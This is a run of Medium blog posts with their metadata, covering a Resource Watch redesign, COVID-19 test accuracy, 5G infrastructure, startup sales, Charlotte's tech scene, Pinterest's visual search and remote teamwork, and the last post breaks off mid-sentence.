We’re turning our attention to better mobile design, and the design choices we’ve made up to now will make that next step easier to do. We’ve also opened up new possibilities for user customisation. I’m already feeling excited about the new things that will come in the future. Humans thinking for humans is what makes Resource Watch so special. We took the time to select which datasets should be offered up to each user. We haven’t relied on an algorithm to make those choices. When a user chooses a dataset, the recommendations they see will be contextually related and suggested by another human. Martin: I feel there is something cute and compact about the new Resource Watch, a bit like what Dani was saying before: you’re not getting rid of anything, it’s more that datasets are much more visible and ordered, as if it were a very tidy cupboard. I also really like the great job that the team did on the “explanations” (metadata) page of each dataset. In the new design, instead of redirecting users to a new page, the key bits of information have been condensed, so that they can now just fit into an elegant sidebar solution. Users can read the text information, and yet not lose sight of the map! Learn something new about our planet today on the Resource Watch explore page!
https://medium.com/vizzuality-blog/how-we-made-resource-watch-even-easier-to-use-37c21550a8a9
['Camellia Williams']
2020-07-15 13:50:47.657000+00:00
['Environment', 'User Research', 'Design', 'UX', 'Data']
How Accurate and Reliable is COVID-19 Testing?
COVID-19 / MEDICINE / HEALTH How Accurate and Reliable is COVID-19 Testing? PCR-based nasal swab testing and serological antibody testing both have certain limitations. As more and more state health departments and private enterprises continue to ramp up testing capacity for COVID-19, several health experts warn that test results are not 100 percent accurate and should be interpreted in the context of clinical presentation and exposure risk. The most commonly used PCR-based nasal swab test to detect SARS-CoV-2 is highly specific but not very sensitive, meaning positive results are more useful than negative results. In other words, a positive result almost guarantees infection with the novel coronavirus but a negative result cannot rule out the presence of infection. “The issue with the tests for the SARS-CoV-2 virus is that there has not been time to test them rigorously before deploying them in the field,” says Dr. Gary L. LeRoy, president of the American Academy of Family Physicians. “Most polymerase chain reaction (PCR) and antibody tests have years of laboratory testing before they are used. We just don’t have that kind of time. The major concern for false negatives is someone who tests negative, thinking they are not infected, could unknowingly spread the virus into the community.” Healthcare worker administers nasal swab test for COVID-19 at a drive-thru facility (Photo by Zstock) An article published in Mayo Clinic Proceedings draws attention to the risk posed by over-reliance on COVID-19 testing to make public health decisions. Priya Sampathkumar, M.D., an infectious diseases specialist at Mayo Clinic and study co-author, writes that healthcare officials should anticipate a “less visible second wave of infection from people with false-negative test results.” Based on preliminary evidence from China, quantitative reverse transcription polymerase chain reaction (qRT-PCR) COVID-19 testing on nasal swab samples may produce false negatives up to 30% of the time when testing is conducted 0–7 days after illness onset. After 15 days of illness, the chance of receiving a false negative result shoots up to 50%. That false negative figure may be even higher in the US, according to Harlan Krumholz, M.D., a professor of medicine at Yale. In an opinion piece for The New York Times, Dr. Krumholz expounds: “There are many reasons a test would be falsely negative under real-life conditions. Perhaps the sampling is inadequate. A common technique requires the collection of nasal secretions far back in the nose — and then rotating the swab several times. That is not an easy procedure to perform or for patients to tolerate. Other possible causes of false negative results are related to laboratory techniques and the substances used in the tests…If you have had likely exposures and symptoms suggest Covid-19 infection, you probably have it — even if your test is negative.” Nasal swab sample for COVID-19 test in the laboratory (Photo by Robert Kneschke) Dr. Alain Chaoui, head of Congenial Healthcare, a practice with 50,000 patients across five locations in Massachusetts, told The Boston Globe, “A lot of my patients who have symptoms, who I clinically think have COVID-19, are testing negative.” Chaoui is nonetheless advising all his patients who test negative for the virus to assume they are infected and self-quarantine until symptom-free for at least 72 hours. Michelle Taylor tested negative for COVID-19 twice despite presenting with concerning symptoms, including loss of taste and smell. 
Several doctors have said the long swabs inserted deep into a patient's nose could miss the virus if the patient is not showing many symptoms at the time of the test. Dr. Paul Pottinger, an infectious disease physician at UW Medical Center, explains, “The one caveat like we talked about before, if you go in to get tested too early — for example if you have no symptoms at all — then the test may not work very well. It's really designed and validated for people who are having symptoms of infection when they have the test.”

According to Dr. Lee Harold Hilborne, a professor of pathology and laboratory medicine at UCLA, the high rate of false negatives may be due to improper sample collection rather than inaccurate analytical laboratory techniques. Hilborne elaborates, “The majority of issues contributing to error in diagnostic testing are pre-analytic. These occur during specimen order, collection, and transport, before the specimen ever reaches the lab. We know that collection methods do not always pick up the virus. Studies suggest current swab collection may have sensitivity in the range of 60 to 75 percent. That means the specimen submitted to the laboratory from a patient with the infection will not contain the virus roughly 25 to 40 percent of the time.”

RT-PCR test kit to detect presence of 2019-nCoV in clinical specimens (Photo by tilialucida)

To address the risks associated with false-negative test results, Dr. Sampathkumar and colleagues outlined four evidence-based recommendations:

1. Continued strict adherence to physical distancing, hand-washing, surface disinfection, masking and other preventive measures, regardless of risk level, symptoms or COVID-19 test results, must be emphasized.

2. Development of highly sensitive and specific tests, including improved RT-PCR tests and serological assays to detect antibodies, is needed to minimize the incidence of false-negative results and the risk of ongoing transmission based on a false sense of security.

3. Risk levels should be assessed prior to testing. Negative test results should be interpreted with caution, especially for individuals in higher-risk groups, such as healthcare workers.

4. Risk-stratified protocols must be put in place in order to properly interpret negative test results. These protocols should employ statistical data on diagnostics, transmission, and outcomes.

“For truly low-risk individuals, negative test results may be sufficiently reassuring,” says Colin West, M.D., Ph.D., a Mayo Clinic physician and the study's first author. “For higher-risk individuals, even those without symptoms, the risk of false-negative test results requires additional measures to protect against the spread of disease, such as extended self-isolation.”

2019-nCoV IgM/IgG antibodies diagnostic laboratory test (Image by science photo)

What about blood tests to detect antibodies, the body's response to the virus? These tests have limited utility from a diagnostic standpoint, as the body may not have had enough time to produce detectable antibodies in the early stages of infection, leading to false negative results. However, serological testing may be used to detect previous exposure, evaluate community spread, and assess antibody titers. But for now, testing results are fraught with uncertainty. While individuals who recover from viral infections usually emerge with some degree of immunity, it is not yet known to what extent and for how long immunity to COVID-19 may last.
Researchers are still unclear as to whether the presence of antibodies necessarily confers immunity to the novel coronavirus. Higher levels of antibodies generally indicate the mounting of a stronger immune response, but the levels of antibodies needed for COVID-19 immunity have not yet been established. The reliability of antibody testing is another point of contention adding to the confusion. In Laredo, Texas, a purchase of 20,000 rapid COVID-19 tests was recently seized by the federal government after local health department officials discovered the tests were only accurate about 20 percent of the time. Generally, antibody tests that utilize a technique known as ELISA (enzyme-linked immunosorbent assay) tend to outperform point-of-care (POC) lateral flow tests in terms of both sensitivity and specificity.
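One way to see why the same negative result can be reassuring for one person and worrisome for another is to run the numbers with Bayes' theorem. The short Python sketch below is purely illustrative: the 70% sensitivity, 99% specificity, and the two pretest probabilities are hypothetical round numbers chosen to fall in the ranges discussed above, not measured values for any particular assay.

def predictive_values(sensitivity, specificity, pretest_probability):
    # Overall probability of a positive result in this risk group
    p_pos = sensitivity * pretest_probability + (1 - specificity) * (1 - pretest_probability)
    # P(infected | positive test) and P(infected | negative test), via Bayes' theorem
    p_infected_given_pos = sensitivity * pretest_probability / p_pos
    p_infected_given_neg = (1 - sensitivity) * pretest_probability / (1 - p_pos)
    return p_infected_given_pos, p_infected_given_neg

for label, pretest in [("low-risk, asymptomatic person", 0.05), ("symptomatic, exposed person", 0.30)]:
    pos, neg = predictive_values(sensitivity=0.70, specificity=0.99, pretest_probability=pretest)
    print(label + ": positive -> " + format(pos, ".0%") + " chance of infection, "
          "negative -> still a " + format(neg, ".0%") + " chance of infection")

With these assumed numbers, a positive result carries a lot of weight in both cases, but a negative result still leaves roughly a one-in-ten chance of infection for the higher-risk person, which is why the recommendations above call for risk-stratified interpretation rather than blanket reassurance.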
https://medium.com/medical-myths-and-models/how-accurate-and-reliable-is-covid-19-testing-41cbc97c1d47
['Nita Jain']
2020-09-30 01:41:53.451000+00:00
['Health', 'Education', 'Science', 'Ideas', 'Covid 19']
Let’s normalize these acronyms for a better Medium
Twitter has acronyms, and so do Instagram and Facebook, when people use fff (follow for follow) or kfb (kindly follow back), and so on. Well, they're lame, but social media acronyms and slang are never cool; still, they make things easier on social media. How about we try the same thing on Medium? I've seen lots of authors trying to reply to all responses; it's usually “thanks for reading.” How about we change that to TFR/tfr! Lots of readers love responding to stories they loved and enjoyed reading. How about we type ILT/ilt/lt! for “I loved this/loved this”? The point is, we could normalize acronyms on Medium and use them “when necessary.” Just a suggestion. What do you think?
https://medium.com/wreader/lets-normalize-these-slangs-for-a-better-medium-d0330f7a570a
['Winifred J. Akpobi']
2020-12-06 10:54:24.378000+00:00
['Short Form', 'Advice', 'Writing Tips', 'Creativity', 'Writing']
How Will Cities Pay for 5G? Ask Facebook.
Photo by Jack Sloop on Unsplash 5G is coming. 5G is the fifth generation of wireless networks. It's significantly faster than current 4G networks, but the reason that 5G is important is not just so we can all watch Tiger King over and over on our phone or scroll endlessly through Facebook. It's going to be essential to handle the massive increase in global mobile traffic that is expected in the next few years. Some estimates suggest that there will be over 5 times the mobile traffic in 2024 that there is today. 5G will be required to support that traffic. But there's another reason that 5G will be important: it will enable cities to become Smart Cities.

What are smart cities? Smart Cities are basically cities that use technology to make planning and service delivery more efficient. The idea is that if you have a bunch of data about how resources are used or the behavior of people in the city, you can create a better functioning, safer city. For example, you can imagine a city that uses information about traffic and congestion to make traffic light wait times more efficient. Or, smart garbage disposal sites that send a signal when they are full, making disposal services more efficient. Information about water usage, electricity usage, and how people move throughout a city can also be used to inform policies and projects. Barcelona is already using this kind of technology to tell citizens where there are open parking spaces. Stockholm, Amsterdam, and Copenhagen also each have smart city projects under development. At their core, smart cities rely on data to help make more effective administrative decisions. This data comes from sensors throughout a city that are connected over the Internet. Which brings us back to 5G: these types of large scale city design changes are possible, but only if they are supported by a suitably fast wireless network. The current networks would not be able to support these Smart City projects on a broad scale — but 5G networks could. Cities are therefore trying to build or facilitate the infrastructure needed for 5G networks, not only because they will be necessary to make those cities competitive, attract businesses, and give users the ability to download movies in seconds, but also because it is necessary to support a Smart City vision.

If 5G is so important, why is it taking so long to get? Because it's expensive. 5G networks are much faster than 4G, but the frequencies are also much higher — they're between 24 and 72 GHz on a 5G network. What that means is that the signals don't reach very far and they are easily blocked by trees, buildings, and other landscape features. To have the same kind of coverage that is possible with 4G networks, there would have to be many more cell towers. For cities and wireless companies, that means building a lot more infrastructure and laying way more fiber optic cable. And this is really expensive.

Enter Facebook. Facebook seems to be expanding into every area of tech life (including getting into the cyber currency business), so it may not come as a surprise to you that they have also been working on several projects to improve internet access. Their solution to the 5G infrastructure problem is a project called Terragraph. The solution they propose is to attach small cells, which connect networks wirelessly, to existing buildings and infrastructure. The small cells can be placed between existing cell towers. They act as intermediaries, connecting the cell towers to users and extending the reach of those towers.
Over long distances, this small cell wireless technology might not work very well. But as a “last mile” step between existing cell infrastructure and users, it's able to deliver very fast service. And since the small cells can deliver data and connectivity from the cell towers to users wirelessly, they eliminate the need to lay more fiber optic cable, significantly cutting the cost of infrastructure.

Facebook is not the only player in this game. At least a few other companies are also beginning to prototype similar “last mile” small cell technologies. This may be a good thing — while this kind of infrastructure will be useful, there may be some legitimate privacy concerns about the company providing internet connectivity also having access to so much personal information about us through our online profiles.

What does this all mean for us? 5G will be coming, one way or another. But with this new small cell technology, it may get to us a little quicker and with a much lower price tag attached. This is good news. Many Americans still don't have access to broadband. The appearance of 5G will likely begin in the biggest cities, and may not be accessible to most Americans for many years. But the less expensive it is to build the infrastructure, the quicker people are likely to have access to it. Ultimately, 5G networks will mean much faster speeds and reduced latency for the users who have access to them. For business, it may mean an improved ability to innovate. And for cities, it means the potential to begin to create smart systems that improve service delivery.
https://medium.com/social-science/how-will-cities-pay-for-5g-ask-facebook-a97db6f7b786
['Ramsay Lewis']
2020-05-02 21:17:52.646000+00:00
['Technology', 'Cities', 'Science', 'Internet of Things', 'Future']
9 Popular GitHub Repos For Every Web Developer
Realworld The first repository in this list is Realworld. Its creators call it nothing less than “The Mother of all Demo Apps.” A bold statement, for sure, but I don't think it's an exaggeration. Realworld is an exemplary Medium.com clone (yes, the very platform you are probably surfing right now!). But not only that. The repository lets you choose between different front-end and back-end implementations, which you can happily mix. Vue.js + Node/Express or React/Redux + Rust? They got it! Realworld shows you how the exact same blog app is built on almost any popular language or framework. How awesome is that?
https://medium.com/better-programming/9-popular-github-repos-for-every-web-developer-6826582291bc
['Simon Holdorf']
2020-02-19 18:28:48.177000+00:00
['Technology', 'Programming', 'Productivity', 'Creativity', 'JavaScript']
Why Your Startup Isn’t Getting the Right Customers
Why Your Startup Isn't Getting the Right Customers And what it takes to actually sell your “dream customers” Photo by krakenimages on Unsplash

“I was sure our product would be perfect for them,” the founder fumed as she dropped into the chair on the other side of my desk. She was building software to help automate hospital billing services — a notoriously complex industry — and she was coming from a meeting where she'd pitched her software to the billing management team at the enormous hospital system associated with my university. To her, this seemed like a “dream customer,” and she couldn't understand why they weren't interested.

“So the meeting didn't go well?” I joked.

She rolled her eyes, clearly not in the mood for my usual sarcasm. “It went terribly,” she moaned. “It felt like they were basically trying to push me out the door as quickly as they could. They had no interest in what I was pitching.”

“Why was that?” I asked.

She threw open her arms. “How the heck am I supposed to know? They didn't tell me anything.”

“It's not their job to tell you,” I reminded her. “But it's your job to figure it out. Since they didn't react to your pitch the way you expected, what does that tell you?”

“That I'm a failure,” she huffed.

“Well, I suppose you did fail,” I replied. “But that doesn't make you a failure. It's only a failure if you can't learn something. In this case, you actually have some valuable new data.”

“But they didn't tell me anything,” she said. “They weren't remotely interested.”

“That, right there!” I exclaimed, “That's important data. You met with a company you thought was your dream customer and they had no interest in what you were selling. Shouldn't that tell you something?”

“I guess,” she said. “I mean… I guess it tells me I was wrong about who my dream customer should be.”

“And you don't think that's important data?” I asked.

“Yeah… I guess so,” she sighed.

“I know so,” I said, feeling like I was trying to drag out an important lesson from my four-year-old daughter rather than a 20-something. “So what's the next question you should be asking yourself?”

She thought for a few moments, then shook her head in frustration. “I have no idea. Why was I such an idiot?”

“That's a good place to start,” I said. She raised her eyebrows, so I quickly explained further: “Not that I'm calling you an idiot. But you clearly misunderstood something about this particular customer's business. That's a big deal. In order to figure out how to target the right customers, you need to figure out what you've misunderstood.”

“And how do I do that?” she asked.

“Empathy,” I answered. “It's one of the most important skills for an entrepreneur to develop. You have to be able to put yourself in the shoes of your prospective customers and attempt to see the world from their perspective.”
https://medium.com/swlh/why-your-startup-isnt-getting-the-right-customers-9f6972fb1e98
['Aaron Dinin']
2020-10-31 18:41:41.859000+00:00
['Work', 'Sales', 'Business', 'Startup', 'Entrepreneurship']
Charlotte — a New Technology Hub. Slalom Charlotte has now been around…
Slalom Charlotte has now been around for 1 year — traversing WeWork and our new home at the Railyard in Southend. We are about to have our launch party and I wanted to reflect on the last 6 months in Charlotte, post the last 7 years in San Francisco. It’s been a growth-fueled ride, with all the trappings you want to see in a market you’re invested in. I wanted to capture all the amazing things that have been happening but also set the stage on what we’re building: THE most impactful consulting firm in the Charlotte region. Folks that join our Charlotte market are going to grow to heights they didn’t think possible, and work on products and solutions that transform companies and industries here. I spent the last 7 years in San Francisco working with some of the most innovative companies on the planet. I’ve taken much of that learning to Charlotte, and I’m floored at the opportunity here. It’s an incredible time to be in Charlotte. It’s not only the abundance of BBQ or the myriad of breweries, but the passion and care the community has here. (There are a lot of breweries, wowza) It’s an environment that you can grow and flourish in. My family and I have now been out here for 6 months, it’s felt like a few days. I’m excited to share more on the great things happening in Charlotte and Slalom. So, what is happening in Charlotte? IT’S BANKING! Yes, and it’s actually more — it’s manufacturing, retail, healthcare, telecom, defense and also banking. :) I am amazed at the diversity of industry here, which allows for us to really stand by the statement of diversity of work for our consultants, designers and engineers. There is not just diversity of industry, but diversity of work — modern application design, development, machine learning, IoT, cloud native architecture and transformation across [insert favorite buzzword]. A myriad of companies have announced technology hubs and new centers in Charlotte over the last few months. Why you might ask? Talent to cross train, attractive wages, lower housing costs than major 5 cities, good weather, proximity to top university areas, mountains and beaches. Here’s what I’ve noticed coming from one of the technology epicenters — you can do interesting, challenging, dynamic work in the field and it doesn’t solely have to be the Bay Area. I imagine that’s obvious to folks in other regions, but oftentimes the Silicon Valley influence can steer the conversation on tech work. There is no longer a requirement to be on the coast for technology adoption and high wages. The proliferation of services across the cloud vendors, availability of open source experts and education has catapulted these supposed second cities into soon-to-be-powerhouses. Charlotte on the verge — it will be a 3 year journey I’ve spent a lot of time with technology and business leaders in Charlotte, across most industries, and I’ve learned that these leaders are starved for talent, adoption of new technologies, practices and evolution. Many of the companies here are getting underway with cloud technologies, but what is so attractive is that many are grabbing onto AI & ML use cases as a catalyst for adoption. That will result in both super interesting initial work, and some complex enterprise work to set foundational cloud architecture and services. If you are a data scientist, designer or engineer, I would strongly consider the curve here. As I alluded to earlier, there are numerous companies announcing technology hubs, a new presence or a relocation to Charlotte in the last 6–12 months. 
It's encouraging, but also a sign of a soon-to-be-challenging talent war. Not so dissimilar to what many large cities face today, but perhaps pointed given the nature of industry and the frantic pace of new build-outs. By nature of industry, I mean many of the financial and manufacturing firms have a tremendous opportunity to modernize — in service of attaining new customers, delighting those customers and creating compelling products. We are training, and will continue to train, the uber-talented folks coming from these firms to grow into world-class technologists and leaders. An example of the tremendous growth in Charlotte is our Slalom office. I relocated mid-March and we had roughly 20 employees — today we sit north of 110 employees…

A Call Out for Technologists

I have been asked a number of times by local leaders about my perception of the market, and while some of this is highlighted above, I always return with a question — who do you look up to in the technology space, who are your technology leaders? I have been getting a lot of blank stares. Let's change this, together. Let's attract and develop those technology leaders of tomorrow in Charlotte. If you aren't in Charlotte yet, now is the time. You're going to have diversity of industry, diversity of projects, diversity of thought and be a part of the rocket ship.

Similar to getting asked about the technology scene in Charlotte, I get asked quite a bit about “Why Slalom” and frankly spend a lot of time talking with clients and recruits on “Why Slalom”. The rationale is fairly simple: we are a very different consulting firm than many — here you can advise and build, design and innovate, and be on the ground floor to transform our clients. It's rare to be a part of a firm of our size and not be beholden to PowerPoint decks. (As much as I like a good set of slides.) The second and third reasons are that folks that join Slalom can have variety (you don't get pigeon-holed), learn new technologies and patterns, and work with some profound and passionate experts. Our ability and desire to blend management consulting with technology, in a local market model with global services, is simply different.

Charlotte is a great place to live now and will continue to grow into a powerhouse. If any of this piques your interest, I would love to chat. Originally posted on LinkedIn here.
https://medium.com/state-of-analytics/charlotte-a-new-technology-hub-50093c5befde
['Kyle Roemer']
2019-11-26 18:31:28.001000+00:00
['Charlotte', 'Analytics', 'Software Development', 'Startup', 'Cloud Computing']
Building Lens your Look: Unifying text and camera search
Eric Kim | Pinterest engineer, Visual Search In February we launched Lens to help Pinners find recipes, style inspiration and products using the camera in our app to search. Since then, our team has been working on new ways of integrating Lens into Pinterest to improve discovery in areas Pinners love most–particularly fashion–with visual search. What we’ve learned is some searches are better served with text, and others with images. But for certain types of searches, it’s best to have both. That’s why we built Lens your Look, as an outfit discovery system that seamlessly combines text and camera search to make Pinterest your personal stylist. Launching today, Lens your Look enables you to snap a photo of an item in your wardrobe and add it to your text search to see outfit ideas inspired by that item. It’s an application of multi-modal search, where we integrate both text search and camera search to give Pinners a more personalized search experience. We use large-scale, object-centered visual search to provide us with a finer-grained understanding of the visual contents of each Pin. Read on to learn how we built the systems powering Lens your Look! Architecture: Multi-modal search Lens Your Look is built using two of Pinterest’s core systems: text search and visual search. By combining text search and visual search into a unified architecture, we can power unique search experiences like Lens your Look. The unified search architecture consists of two stages: candidate generation and visual reranking. Candidate generation In the Lens your Look experience, when we detect the user has done a text search in the fashion category, we give them the option to also take a photo of an article of clothing using Lens. Armed with both a text query and an image query, we leverage Pinterest Search to generate a high-quality set of candidate Pins. On the text side, we harness the latest and greatest of our Search infrastructure to generate a set of Pins matching the user’s original text search query. For instance, if the user searched for “fall outfits,” Lens your Look finds candidate results from our corpus of outfit Pins for the fall season. We also use visual cues from the Lens photo to assist with candidate generation. Our visual query understanding layer outputs useful information about the photo, such as visual objects, salient colors, semantic category, stylistic attributes and other metadata. By combining these visual signals with Pinterest’s text search infrastructure, we’re able to generate a diverse set of candidate Pins for the visual reranker. Visual reranking Next, we visually rerank the candidate Pins with respect to the query image, such as the Pinner’s article of clothing. The goal is to ensure the top returned result Pins include clothing that closely match the query image. Lens Your Look makes use of our visual object detection system, which allows us to visually rerank based on objects in the image, such as specific articles of clothing, rather than across the entire image. Reranking by visual objects gives us a more nuanced view into the visual contents of each Pin, and is a major component that allows Lens your Look to succeed. For more details on the visual reranking system see our paper recently published at the WWW 2017 conference. Multi-task training: Teaching fashion to our visual models Now that we have object-based candidates, we assign a visual similarity score to each candidate. 
Although we’ve written about transfer learning methods in the past, we needed a more fine-grained representation for Lens your Look. Specifically, our visual embeddings have to model certain stylistic attributes, such as color, pattern, texture and material. This allows our visual reranking system to return results on a more fine-grained level. For instance, red-striped shirts will only be matched with other red-striped shirts, not with blue-striped shirts or red plaid shirts. To accomplish this, we augmented our deep convolutional classification networks to simultaneously train on multiple tasks while maintaining a shared embedding layer. In addition to the typical classification or metric learning loss, we also incorporate task-specific losses, such as predicting fashion attributes and color. This teaches the network to recognize that a striped red shirt shouldn’t be treated the same as a solid navy shirt. Our preliminary results show that incorporating multiple training losses leads to an overall improvement in visual retrieval performance, and we’re excited to continue pushing this frontier. Conclusion Since launching our first visual search product in 2015, the visual search team has developed our infrastructure to support a variety of new features, from powering image search in the Samsung Galaxy S8 to today’s launch of Lens your Look. With one of the largest and richly annotated image datasets around, we have an unending list of exciting ideas to expand and improve Pinterest visual search. If you’d like to help us build innovative visual search features, such as Lens Your Look, join us! Acknowledgements: Lens Your Look is a collaborative effort at Pinterest. We’d like to thank Yiming Jen, Kelei Xu, Cindy Zhang, Josh Beal, Andrew Zhai, Dmitry Kislyuk, Jeffrey Harris, Steven Ramkumar and Laksh Bhasin for the collaboration on this product, Trevor Darrell for his advisement and the rest of the visual search team.
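As a rough illustration of the reranking step described above (not Pinterest's actual implementation, whose models and features are far richer), the final scoring can be thought of as comparing the embedding of the detected query object against the embeddings of the objects in each candidate Pin and sorting by similarity. A minimal NumPy sketch, assuming some visual model has already produced the embeddings and that cosine similarity is the measure of choice:

import numpy as np

def rerank_candidates(query_embedding, candidate_embeddings, candidate_ids):
    # Normalize so the dot product becomes cosine similarity
    q = query_embedding / np.linalg.norm(query_embedding)
    c = candidate_embeddings / np.linalg.norm(candidate_embeddings, axis=1, keepdims=True)
    scores = c @ q                 # one similarity score per candidate Pin object
    order = np.argsort(-scores)    # highest similarity first
    return [(candidate_ids[i], float(scores[i])) for i in order]

# toy example: random vectors standing in for a real visual model's output
rng = np.random.default_rng(0)
query = rng.normal(size=128)
candidates = rng.normal(size=(5, 128))
print(rerank_candidates(query, candidates, ['pin_a', 'pin_b', 'pin_c', 'pin_d', 'pin_e']))

In the same spirit, the multi-task training described above can be read as optimizing a weighted sum of losses (the main classification or metric-learning loss plus auxiliary attribute and color losses) over heads that share a single embedding layer, so that the shared embedding is pushed to encode the fine-grained stylistic attributes.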
https://medium.com/pinterest-engineering/building-lens-your-look-unifying-text-and-camera-search-1b2f3ef4e393
['Pinterest Engineering']
2017-11-15 17:12:49.549000+00:00
['Visual Search', 'AI', 'Computer Vision', 'Neural Networks', 'Deep Learning']
MockupShots: Create Your Own Professional Product Shots in Seconds
Writing and Publishing Tools I Use and Recommend MockupShots: Create Your Own Professional Product Shots in Seconds Launch your 2021 marketing efforts with brand new images of your book covers and other products Image created by Jacquelyn Lynn using MockupShots Creating attractive promotional images of your books and information products takes time, expertise, and money. Even though we have the talent and expertise in-house (thanks to the outstanding photography and design skills of Jerry D. Clement), we use MockUpShots to create shareable images of our books in a variety of settings. MockupShots provides more than 600 relevant images (seasonal, holiday, business, casual, with and without people, and more) that you can drop your book cover (or other packaging) into. In seconds, you can download the image to your computer to use any way you want. Image created by Jacquelyn Lynn using MockupShots It’s super easy to use: Just upload your book cover, browse through the mockups, and download the ones you want. Choose from stills, videos, and gifs. MockupShots includes tutorials that show you exactly what to do. Regular lifetime access to MockupShots is $198, but for a limited time, use the special link at the end of this article to get an awesome 60% discount. Pay just $80 for lifetime access to MockupShots for as many books as you want. Image created by Jacquelyn Lynn using MockupShots Use these images on your website, in your marketing materials, on social media — wherever you need professional images of your books in a variety of settings. New images are added regularly. Use MockupShots just once and you’ve more than recovered your investment by eliminating professional photography fees. Get lifetime access for just $80 — a 60% discount off the regular price of $198. Just use my special affiliate link. Go here for a complete list of the resources we use and recommend. This article was originally published on my site at CreateTeachInspire.com. You can reach me there or email me at [email protected]. You might also enjoy: Here’s a little more about me: Finally, here’s how to get a beautiful inspirational quote delivered to your inbox every Saturday:
https://medium.com/publishing-well/mockupshots-create-your-own-professional-product-shots-in-seconds-6ca003ecfb17
['Jacquelyn Lynn']
2020-12-24 01:35:24.742000+00:00
['Self Publishing', 'Business', 'Writing', 'Creativity', 'Photography']
5 Practical Ways to Build Your Email List Like a Smart Marketer
What’s the secret to a successful email campaign? Great design? Engaging subject lines and email copy? Your offer? It’s actually none of these things — while each, in itself, is important, the most crucial aspect of a successful email campaign is a quality email list. A quality email list is one you’ve built through connection with your audience, based on their registered interest, and ideally, segmented by each person’s preferences. So how can you build a great, effective e-mail list? How can you get more warm leads onto your database in order to target them with your future offers? Here are some tips. 1. Website/blog is the best place to take the first step Your website or blog is generally the first thing people visit — so leverage the power of your website and place an email sign-up form on it. When a visitor lands on your blog or site, give him/her a reason to subscribe — offer something valuable in exchange for their information. This could be an educational resource, eBook, white paper, special discount, free demo, or some other incentives. See how Blurb does this: 2. Use the power of content upgrade Brian Dean says that content upgrade increased his conversion rate from 0.54% to 4.82%. That’s 785%. Nathan Ellering, Content Marketing Lead at CoSchedule, shared his take here: “Content upgrade is an absolute best way to build an email list of active subscribers, just like how we’ve built a list of more than 100,000 subscribers at CoSchedule.” If you’re not using the power of content upgrade, you’re missing a great opportunity to build your email list. Create an informational and interesting article, and offer an actionable cheatsheet or quick guide as an upgrade. Add a line at the beginning, middle or end of the post which encourages visitors to download your cheat sheet or guide. Here’s a content upgrade example from Brian Dean: 3. Put a signup button on your Facebook Page Social media is a great medium through which to build an audience, and you can also use it to grow your email list. Add a ‘Sign up’ call to action button to your Facebook Page to collect email addresses — it’s a great way to convert your fans/followers into your subscribers. See how Birchbox does a great job by placing sign up button their Facebook page: 4. Hosting a Webinar Hosting a webinar can be a great way to communicate with your targeted audience — and collect email addresses. The best way to do this is to find trending topic relevant to your service, then conduct a webinar based on that subject. You can then ask potential attendees to provide their contact information in order to join the webinar — and don’t forget to promote it across the social media platforms. See how SEMrush adds a registration form to their Webinar page: 5. Run a Facebook Contest Facebook is also a great channel to run a contest or special offer (Instagram, too, can be beneficial on this front) Create a compelling graphic, engaging title and an irresistible giveaway, then ask your audience for their email address in order to join the contest. Take a look at London Drugs’ Facebook contest: Now that you have five simple, and proven, ways to build a quality email list, it’s time to implement them. Hopefully these tactics will help you to get a good amount of subscribers — start building your list today. Call To Action I’m creating an eBook: “Email Now: A Human Guide to Learn the Art of Email Marketing.” Do you want early access of it? Get on VIP List Here.
https://medium.com/the-mission/5-practical-ways-to-build-your-email-list-like-a-smart-marketer-2b6854ff09a7
['Pawan Kumar']
2018-07-05 15:47:57.973000+00:00
['Email Marketing', 'Marketing', 'Business', 'Digital Marketing', 'Startup']
Remote Collaboration for World Domination
Make great work with your team no matter where you are in the world. If you’re part of a large te­am or global company then you’re likely collaborating across time and geography every day. Maybe the developers­ on your team are in a different country, your design lead travels frequently or your client is in another city. Regardless of your role or locatio­n you could be reviewing specs, testing prototypes, pitching ideas, coordinating meetings, or delivering a workshop at any point in your day. These collaborative efforts between colleagues, stakeholders, and customers are key to the success of any project. When it comes to delivering these tasks remotely, however, individuals can become separated or ‘siloed’ because of poor communication, cultural differences, and time constraints. I’ve been working with internationally dispersed teams for some years now and I wanted to reassure you that working remotely shouldn’t be a barrier for you and your team to co-create successfully. In fact, remote work offers up lots of unique opportunities for both the individuals and the organizations that embrace it! Lots of companies advocate strongly for remote work. InVision and Automattic being two particularly good examples of this. And it makes perfect sense: allowing employees to work from anywhere in the world is not just good for recruitment but it’s a sure way to increase diversity in your organization. For startups or businesses that want to break into new markets, having a globally dispersed workforce is also a smart way to understand local trends and culture. There are many benefits to remote collaboration but there are also challenges and considerations. If you’re new to this way of working, managing a global team, or if you’re considering a transition abroad and hoping to hold your current role, these tips (tried and tested) may prove useful to you and your team along the way. 1. Start by building relationships. Good collaboration begins with trust. If you’re working alongside someone (even virtually) it’s important you get to know them. Make an effort to understand their strengths, weaknesses, personality, behaviours, and goals. Chatting about hobbies might sound unimportant in the context of business but when you’re not interacting with your teammates every other day over coffee or lunch, allowing time for this may be more beneficial than you think. People do their best work when they’re comfortable in their environment and trust their co-workers. So, get to know each other! Pro-tip: Carve out an afternoon for your team to share something that is interesting or personal to them. Maybe it’s a hobby or side hustle that reflects what they like to do outside of work. This will help you gain a deeper level of empathy and understanding for your team. Lightning talks or lunch n’ learns are fun platforms for these types of activities. (Although traditionally held in-person, you can simply use video conferencing software if your team is remote). 2. Have an agenda and set some goals. Time is precious. To get the best out of your remote session — whether it’s a call, a workshop, a review etc. — always have an agenda set in advance. Even a loose list of objectives will keep you on track and focused on what needs to get done. Above all, end your session with next steps or a to-do list to help clarify everyone’s responsibilities moving forward. I can’t stress how important this is when it comes to remote working. 
If you’re in a different time zone you may not have the opportunity to check in for another day or two (maybe longer), depending on schedules. Be sure that everyone is aligned and clear on their tasks and goals before the working day ends. 3. Tool up. There are so many great digital tools available — lots for free — that enable teams to brainstorm, plan, or workshop in real-time. It might take a little extra time to learn these tools but that investment up front will increase productivity, communication, and transparency in the long run. Some of my favourites: Slack Messaging platform for the workplace. Mural Virtual whiteboard. Perfect for design thinking activities and research synthesis. Trello Easy to use project management tool. Google Docs and Box File sharing in the cloud. InVision Digital product design platform with prototyping tools and helpful resources. Flow For tracking your tasks and projects. GitHub A dev platform that works for anyone. Track tasks, review code or manage projects. Prototypr A one-stop shop for discovering thousands of design resources and tools. 4. Put the phone down. Too often remote collaboration takes the form of a conference call. Unless the situation warrants an over-the-phone conversation then you should avoid dialling in blindly. Body language is a huge part of how we communicate and is far more effective and meaningful than the words we use alone. Using real-time video services like Zoom, WebEx or Skype will help break down some of the linguistic or cultural barriers that might exist across your team. Anyway, conference calls are notoriously 